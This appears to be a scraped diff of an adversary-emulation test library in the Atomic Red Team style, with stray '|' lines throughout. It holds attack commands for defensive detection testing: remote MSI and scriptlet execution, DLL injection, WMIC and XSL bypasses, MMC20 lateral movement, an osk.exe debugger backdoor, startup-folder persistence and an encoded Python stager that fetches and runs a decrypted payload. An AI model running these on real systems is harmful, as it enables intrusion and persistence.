"Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'SCHTASKS /Delete /TN "Atomic task" /F
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Powershell Cmdlet Scheduled Task
|
|
|
|
|
description: "Create an atomic scheduled task that leverages native powershell
|
|
|
|
|
cmdlets.\n\nUpon successful execution, powershell.exe will create a scheduled
|
|
|
|
@@ -23948,7 +24009,7 @@ execution:
|
|
|
|
|
cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false
|
|
|
|
|
>$null 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1064:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -24017,7 +24078,7 @@ execution:
|
|
|
|
|
- name: Create and Execute Bash Shell Script
|
|
|
|
|
description: 'Creates and executes a simple bash script.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -24032,7 +24093,7 @@ execution:
|
|
|
|
|
- name: Create and Execute Batch Script
|
|
|
|
|
description: 'Creates and executes a simple batch script.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -24052,7 +24113,7 @@ execution:
|
|
|
|
|
\n"
|
|
|
|
|
cleanup_command: 'del #{script_to_create} >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1035:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -24139,7 +24200,7 @@ execution:
|
|
|
|
|
dependencies:
|
|
|
|
|
- description: PsExec tool from Sysinternals must exist on disk at specified
|
|
|
|
|
location (#{psexec_exe})
|
|
|
|
|
prereq_command: if (Test-Path "#{psexec_exe}"") { exit 0} else { exit 1}
|
|
|
|
|
prereq_command: if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1}
|
|
|
|
|
get_prereq_command: |-
|
|
|
|
|
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
|
|
|
|
|
Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
|
|
|
|
@@ -24150,7 +24211,7 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: '#{psexec_exe} \\#{remote_host} "C:\Windows\System32\calc.exe"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1218:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -24264,7 +24325,7 @@ execution:
|
|
|
|
|
description: 'Injects arbitrary DLL into running process specified by process
|
|
|
|
|
ID. Requires Windows 10.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -24288,12 +24349,12 @@ execution:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: SyncAppvPublishingServer - Execute arbitrary PowerShell code
|
|
|
|
|
description: 'Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.
|
|
|
|
|
Requires Windows 10.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -24305,12 +24366,12 @@ execution:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'SyncAppvPublishingServer.exe "n; #{powershell_code}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Register-CimProvider - Execute evil dll
|
|
|
|
|
description: 'Execute arbitrary dll. Requires at least Windows 8/2012. Also
|
|
|
|
|
note this dll can be served up via SMB
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -24329,12 +24390,12 @@ execution:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Msiexec.exe - Execute Local MSI file
|
|
|
|
|
description: 'Execute arbitrary MSI file. Commonly seen in application installation.
|
|
|
|
|
The MSI opens notepad.exe when sucessfully executed.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -24351,13 +24412,13 @@ execution:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'msiexec.exe /q /i "#{msi_payload}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Msiexec.exe - Execute Remote MSI file
|
|
|
|
|
description: 'Execute arbitrary MSI file retrieved remotely. Less commonly seen
|
|
|
|
|
in application installation, commonly seen in malware execution. The MSI opens
|
|
|
|
|
notepad.exe when sucessfully executed.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -24369,7 +24430,7 @@ execution:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'msiexec.exe /q /i "#{msi_payload}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Msiexec.exe - Execute Arbitrary DLL
|
|
|
|
|
description: |
|
|
|
|
|
Execute arbitrary DLL file stored locally. Commonly seen in application installation.
|
|
|
|
@@ -24393,11 +24454,11 @@ execution:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'msiexec.exe /y "#{dll_payload}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Odbcconf.exe - Execute Arbitrary DLL
|
|
|
|
|
description: 'Execute arbitrary DLL file stored locally.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -24416,7 +24477,7 @@ execution:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'odbcconf.exe /S /A {REGSVR "#{dll_payload}"}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: InfDefaultInstall.exe .inf Execution
|
|
|
|
|
description: |
|
|
|
|
|
Test execution of a .inf using InfDefaultInstall.exe
|
|
|
|
@@ -24441,7 +24502,7 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'InfDefaultInstall.exe #{inf_to_execute}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1216:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -24498,7 +24559,7 @@ execution:
|
|
|
|
|
description: 'Executes the signed PubPrn.vbs script with options to download
|
|
|
|
|
and execute an arbitrary payload.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -24512,12 +24573,12 @@ execution:
|
|
|
|
|
command: 'cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
|
|
|
|
|
localhost "script:#{remote_payload}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: SyncAppvPublishingServer Signed Script PowerShell Command Execution
|
|
|
|
|
description: 'Executes the signed SyncAppvPublishingServer script with options
|
|
|
|
|
to execute an arbitrary PowerShell command.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -24530,12 +24591,12 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'C:\windows\system32\SyncAppvPublishingServer.vbs "\n;#{command_to_execute}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: manage-bde.wsf Signed Script Command Execution
|
|
|
|
|
description: 'Executes the signed manage-bde.wsf script with options to execute
|
|
|
|
|
an arbitrary command.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -24551,7 +24612,7 @@ execution:
|
|
|
|
|
cscript manage-bde.wsf
|
|
|
|
|
cleanup_command: 'set comspec=C:\Windows\System32\cmd.exe
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1153:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -24596,7 +24657,7 @@ execution:
|
|
|
|
|
- name: Execute Script using Source
|
|
|
|
|
description: 'Creates a script and executes it using the source command
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -24610,7 +24671,7 @@ execution:
|
|
|
|
|
description: 'Creates a script and executes it using the source command''s dot
|
|
|
|
|
alias
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -24680,7 +24741,7 @@ execution:
|
|
|
|
|
- name: Space After Filename
|
|
|
|
|
description: 'Space After Filename
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
@@ -24887,7 +24948,7 @@ execution:
|
|
|
|
|
- name: MSBuild Bypass Using Inline Tasks
|
|
|
|
|
description: 'Executes the code in a project file using. C# Example
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -24907,7 +24968,7 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #{filename}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1204:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -24997,7 +25058,7 @@ execution:
|
|
|
|
|
jse_path:
|
|
|
|
|
description: 'Path for the macro to write out the "malicious" .jse file
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
type: String
|
|
|
|
|
default: C:\Users\Public\art.jse
|
|
|
|
|
dependency_executor_name: powershell
|
|
|
|
@@ -25053,7 +25114,7 @@ execution:
|
|
|
|
|
cleanup_command: 'Remove-ItemProperty -Path ''HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\''
|
|
|
|
|
-Name ''AccessVBOM'' -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: OSTAP JS version
|
|
|
|
|
description: "Malicious JavaScript executing CMD which spaws wscript.exe //e:jscript
|
|
|
|
|
\nExecution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1)
|
|
|
|
@@ -25164,7 +25225,7 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'wmic useraccount get /ALL /format:csv
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: WMI Reconnaissance Processes
|
|
|
|
|
description: |
|
|
|
|
|
An adversary might use WMI to list Processes running on the compromised host.
|
|
|
|
@@ -25176,7 +25237,7 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'wmic process get caption,executablepath,commandline /format:csv
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: WMI Reconnaissance Software
|
|
|
|
|
description: |
|
|
|
|
|
An adversary might use WMI to list installed Software hotfix and patches.
|
|
|
|
@@ -25188,7 +25249,7 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'wmic qfe get description,installedOn /format:csv
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: WMI Reconnaissance List Remote Services
|
|
|
|
|
description: "An adversary might use WMI to check if a certain Remote Service
|
|
|
|
|
is running on a remote device. \nWhen the test completes, a service information
|
|
|
|
@@ -25212,7 +25273,7 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'wmic /node:"#{node}" service where (caption like "%#{service_search_string}%")
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: WMI Execute Local Process
|
|
|
|
|
description: |
|
|
|
|
|
This test uses wmic.exe to execute a process on the local host.
|
|
|
|
@@ -25229,10 +25290,10 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'wmic process call create #{process_to_execute}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'wmic process where name=''#{process_to_execute}'' delete
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: WMI Execute Remote Process
|
|
|
|
|
description: "This test uses wmic.exe to execute a process on a remote host.
|
|
|
|
|
Specify a valid value for remote IP using the node parameter.\nTo clean up,
|
|
|
|
@@ -25255,11 +25316,11 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'wmic /node:"#{node}" process call create #{process_to_execute}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'wmic /node:"#{node}" process where name=''#{process_to_execute}''
|
|
|
|
|
delete
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1028:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -25322,8 +25383,10 @@ execution:
|
|
|
|
|
identifier: T1028
|
|
|
|
|
atomic_tests:
|
|
|
|
|
- name: Enable Windows Remote Management
|
|
|
|
|
description: "Powershell Enable WinRM\n\nUpon successful execution, powershell
|
|
|
|
|
will \"Enable-PSRemoting\" allowing for remote PS access. \n"
|
|
|
|
|
description: |
|
|
|
|
|
Powershell Enable WinRM
|
|
|
|
|
|
|
|
|
|
Upon successful execution, powershell will "Enable-PSRemoting" allowing for remote PS access.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -25331,10 +25394,16 @@ execution:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'Enable-PSRemoting -Force
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: PowerShell Lateral Movement
|
|
|
|
|
description: "Powershell lateral movement using the mmc20 application com object.\n\nReference:\n\nhttps://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/\n\nUpon
|
|
|
|
|
successful execution, cmd will spawn calc.exe on a remote computer. \n"
|
|
|
|
|
description: |
|
|
|
|
|
Powershell lateral movement using the mmc20 application com object.
|
|
|
|
|
|
|
|
|
|
Reference:
|
|
|
|
|
|
|
|
|
|
https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/
|
|
|
|
|
|
|
|
|
|
Upon successful execution, cmd will spawn calc.exe on a remote computer.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -25343,11 +25412,11 @@ execution:
|
|
|
|
|
type: string
|
|
|
|
|
default: computer1
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe",
|
|
|
|
|
name: powershell
|
|
|
|
|
command: '[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe",
|
|
|
|
|
$null, $null, "7")
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: WMIC Process Call Create
|
|
|
|
|
description: |
|
|
|
|
|
Utilize WMIC to start remote process.
|
|
|
|
@@ -25375,7 +25444,7 @@ execution:
|
|
|
|
|
NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\"
|
|
|
|
|
/t REG_SZ /d \"cmd.exe\" /f"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Psexec
|
|
|
|
|
description: |
|
|
|
|
|
Utilize psexec to start remote process.
|
|
|
|
@@ -25433,7 +25502,7 @@ execution:
|
|
|
|
|
name: powershell
|
|
|
|
|
command: 'invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1220:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -25527,9 +25596,10 @@ execution:
|
|
|
|
|
- name: MSXSL Bypass using local files
|
|
|
|
|
description: 'Executes the code specified within a XSL script tag during XSL
|
|
|
|
|
transformation using a local payload. Requires download of MSXSL from Microsoft
|
|
|
|
|
at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
|
|
|
|
|
at https://www.microsoft.com/en-us/download/details.aspx?id=21714. Open Calculator.exe
|
|
|
|
|
when test sucessfully executed, while AV turned off.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -25557,13 +25627,14 @@ execution:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: MSXSL Bypass using remote files
|
|
|
|
|
description: 'Executes the code specified within a XSL script tag during XSL
|
|
|
|
|
transformation using a remote payload. Requires download of MSXSL from Microsoft
|
|
|
|
|
at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
|
|
|
|
|
at https://www.microsoft.com/en-us/download/details.aspx?id=21714. Open Calculator.exe
|
|
|
|
|
when test sucessfully executed, while AV turned off.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -25579,12 +25650,12 @@ execution:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: WMIC bypass using local XSL file
|
|
|
|
|
description: 'Executes the code specified within a XSL script using a local
|
|
|
|
|
payload.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -25605,14 +25676,15 @@ execution:
|
|
|
|
|
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/wmicscript.xsl" -OutFile "#{local_xsl_file}"
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'wmic.exe #{wmic_command} /FORMAT:#{local_xsl_file}
|
|
|
|
|
command: 'wmic #{wmic_command} /FORMAT:"#{local_xsl_file}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: WMIC bypass using remote XSL file
|
|
|
|
|
description: 'Executes the code specified within a XSL script using a remote
|
|
|
|
|
payload.
|
|
|
|
|
payload. Open Calculator.exe when test sucessfully executed, while AV turned
|
|
|
|
|
off.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -25626,9 +25698,9 @@ execution:
|
|
|
|
|
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'wmic.exe #{wmic_command} /FORMAT:#{remote_xsl_file}
|
|
|
|
|
command: 'wmic #{wmic_command} /FORMAT:"#{remote_xsl_file}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
lateral-movement:
|
|
|
|
|
T1155:
|
|
|
|
|
technique:
|
|
|
|
@@ -25698,7 +25770,7 @@ lateral-movement:
|
|
|
|
|
command: 'osascript "do shell script "echo \"import sys,base64,warnings;warnings.filterwarnings(''ignore'');exec(base64.b64decode(''aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEpLnJlYWQoKTsKSVY9YVswOjRdO2RhdGE9YVs0Ol07a2V5PUlWKyc4Yzk0OThmYjg1YmQ1MTE5ZGQ5ODQ4MTJlZTVlOTg5OSc7UyxqLG91dD1yYW5nZSgyNTYpLDAsW10KZm9yIGkgaW4gcmFuZ2UoMjU2KToKICAgIGo9KGorU1tpXStvcmQoa2V5W2klbGVuKGtleSldKSklMjU2CiAgICBTW2ldLFNbal09U1tqXSxTW2ldCmk9aj0wCmZvciBjaGFyIGluIGRhdGE6CiAgICBpPShpKzEpJTI1NgogICAgaj0oaitTW2ldKSUyNTYKICAgIFNbaV0sU1tqXT1TW2pdLFNbaV0KICAgIG91dC5hcHBlbmQoY2hyKG9yZChjaGFyKV5TWyhTW2ldK1Nbal0pJTI1Nl0pKQpleGVjKCcnLmpvaW4ob3V0KSkK''));\"
|
|
|
|
|
| python &""
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
'':
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -25812,17 +25884,16 @@ lateral-movement:
|
|
|
|
|
identifier: T1037
|
|
|
|
|
atomic_tests:
|
|
|
|
|
- name: Logon Scripts
|
|
|
|
|
description: 'Adds a registry value to run batch script created in the C:\Windows\Temp
|
|
|
|
|
directory.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Adds a registry value to run batch script created in the %temp% directory. Upon execution, there will be a new environment variable in the HKCU\Environment key
|
|
|
|
|
that can be viewed in the Registry Editor.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
|
script_path:
|
|
|
|
|
description: Path to .bat file
|
|
|
|
|
type: String
|
|
|
|
|
default: "$env:SystemRoot\\Temp\\art.bat"
|
|
|
|
|
default: "%temp%\\art.bat"
|
|
|
|
|
script_command:
|
|
|
|
|
description: Command To Execute
|
|
|
|
|
type: String
|
|
|
|
@@ -25831,16 +25902,16 @@ lateral-movement:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: |
|
|
|
|
|
echo cmd /c "#{script_command}" > #{script_path}
|
|
|
|
|
REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "#{script_path}"
|
|
|
|
|
echo "#{script_command}" > #{script_path}
|
|
|
|
|
REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "#{script_path}" /f
|
|
|
|
|
cleanup_command: |
|
|
|
|
|
REG.exe DELETE HKCU\Environment /v UserInitMprLogonScript /f
|
|
|
|
|
del #{script_path} >nul 2>nul
|
|
|
|
|
del "%USERPROFILE%\desktop\T1037-log.txt" >nul 2>nul
|
|
|
|
|
del #{script_path} >nul 2>&1
|
|
|
|
|
del "%USERPROFILE%\desktop\T1037-log.txt" >nul 2>&1
|
|
|
|
|
- name: Scheduled Task Startup Script
|
|
|
|
|
description: 'Run an exe on user logon or system startup
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Run an exe on user logon or system startup. Upon execution, success messages will be displayed for the two scheduled tasks. To view
|
|
|
|
|
the tasks, open the Task Scheduler and look in the Active Tasks pane.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -25855,7 +25926,7 @@ lateral-movement:
|
|
|
|
|
- name: Logon Scripts - Mac
|
|
|
|
|
description: 'Mac logon script
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
@@ -25868,10 +25939,11 @@ lateral-movement:
|
|
|
|
|
Populate the plist with the location of your shell script\n\n\t defaults
|
|
|
|
|
write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh\n"
|
|
|
|
|
- name: Supicious vbs file run from startup Folder
|
|
|
|
|
description: 'vbs files can be placed in and ran from the startup folder to
|
|
|
|
|
maintain persistance
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: "vbs files can be placed in and ran from the startup folder to
|
|
|
|
|
maintain persistance. Upon execution, \"T1137 Hello, World VBS!\" will be
|
|
|
|
|
displayed twice. \nAdditionally, the new files can be viewed in the \"$env:APPDATA\\Microsoft\\Windows\\Start
|
|
|
|
|
Menu\\Programs\\Startup\"\nfolder and will also run when the computer is restarted
|
|
|
|
|
and the user logs in.\n"
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -25886,9 +25958,11 @@ lateral-movement:
|
|
|
|
|
Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" -ErrorAction Ignore
|
|
|
|
|
Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" -ErrorAction Ignore
|
|
|
|
|
- name: Supicious jse file run from startup Folder
|
|
|
|
|
description: |
|
|
|
|
|
jse files can be placed in and ran from the startup folder to maintain persistance.
|
|
|
|
|
Upon execution, "T1137 Hello, World JSE!" will be printed to the powershell session twice.
|
|
|
|
|
description: "jse files can be placed in and ran from the startup folder to
|
|
|
|
|
maintain persistance.\nUpon execution, \"T1137 Hello, World JSE!\" will be
|
|
|
|
|
displayed twice. \nAdditionally, the new files can be viewed in the \"$env:APPDATA\\Microsoft\\Windows\\Start
|
|
|
|
|
Menu\\Programs\\Startup\"\nfolder and will also run when the computer is restarted
|
|
|
|
|
and the user logs in.\n"
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -25905,7 +25979,8 @@ lateral-movement:
|
|
|
|
|
- name: Supicious bat file run from startup Folder
|
|
|
|
|
description: |
|
|
|
|
|
bat files can be placed in and executed from the startup folder to maintain persistance.
|
|
|
|
|
Upon execution, cmd will be run and immediately closed.
|
|
|
|
|
Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
|
|
|
|
|
folder and will also run when the computer is restarted and the user logs in.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -25992,11 +26067,11 @@ lateral-movement:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
